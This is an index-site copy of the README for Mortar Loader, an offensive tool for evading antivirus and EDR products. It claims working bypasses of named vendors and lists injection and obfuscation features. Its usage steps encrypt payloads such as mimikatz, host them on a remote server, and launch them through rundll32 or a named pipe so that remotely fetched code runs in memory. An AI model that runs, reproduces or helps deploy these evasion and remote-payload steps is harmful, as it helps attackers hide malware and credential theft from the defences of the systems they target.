Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/0xsp-SRD/mortar

evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
https://github.com/0xsp-SRD/mortar

bypass-antivirus bypass-edr evasion redteam-tools

Last synced: about 2 months ago
JSON representation

evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)

Awesome Lists containing this project

README

        

[](https://twitter.com/zux0x3a)

# Mortar Loader

Red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption PE/Shellcode inside the memory streams and execute it leveraging several injection techniques .
Mortar is able to bypass modern anti-virus products and advanced XDR solutions and it has been tested and confirmed bypass for the following:

* Kaspersky :heavy_check_mark:
* ESET AV / EDR :heavy_check_mark:
* Malewarebytes :heavy_check_mark:
* Mcafee :heavy_check_mark:
* Windows defender :heavy_check_mark:
* Cylance :heavy_check_mark:
* TrendMicro :heavy_check_mark:
* Bitdefender :heavy_check_mark:
* Norton Symantec :heavy_check_mark:
* Sophos EDR :heavy_check_mark:

## Updated features

The newer version release (v3) has been released with the following features :

* Fileless execution with remote staged encrypted binary or shellcode.
* Early Bird APC injection.
* Process masquerading.
* Supports Named Pipes.
* Strings and function calls obfuscation.
* Mortar covert reload subroutine.
* Delay execution techniques.

For more technical description, refer to the following blogpost : https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html

## Usage

### Encryptor

The encryptor encrypt C ShellCode and PE binaries and write the output into .enc file.
you are allowed to use any payload(MSF/cobalt/Havoc..etc) as you prefer as long it is x64 arch and not RAW.

```
root@kali>./encryptor -f mimikatz.exe -o bin.enc
root@kali>./encryptor -f shellcode.c -o bin.enc
```

### Mortar Loader Library

The newer release leverage several techniques combined with remote payload fetching, recommend to refer to following blogpost to get more insights.

for quick instructions

```
# PE Forking

1. host your encrypted binary on remote host.
2. encode the final URL with base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled.
```

currently supports early bird injection in combination with Named Pipes to receive variables for final execution.
```
1. inject Mortar DLL into remote process( DLL injection, Hijacking, sideloading).
2. connect into the named pipe to supply your URL
echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs
3. payload will be executed once valid value has been recieved.
```

## Compiling

the project has been coded using FPC(Free Pascal), the compiling procedures are straightforward by downloading and installing Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads).

for the encryptor you you can download it from the release section or compile it easily with lazarus ide.

```
#Debian & Ubuntu

apt install fpc
apt install lazarus-ide

```

## Publications

* The v1 release : https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
* Mortar Loader v2 features : https://0xsp.com/offensive/mortar-loader-v2/
* CrestCon Asia 2021 talk : https://www.youtube.com/watch?v=H7EMBz7GLMk

## Sponsor ?
the development of mortar or any shared project is an outcome from my personal time.
- you show continues appreciation of my work.
- you will get early access to pre-release.
- ask questions / will be answered.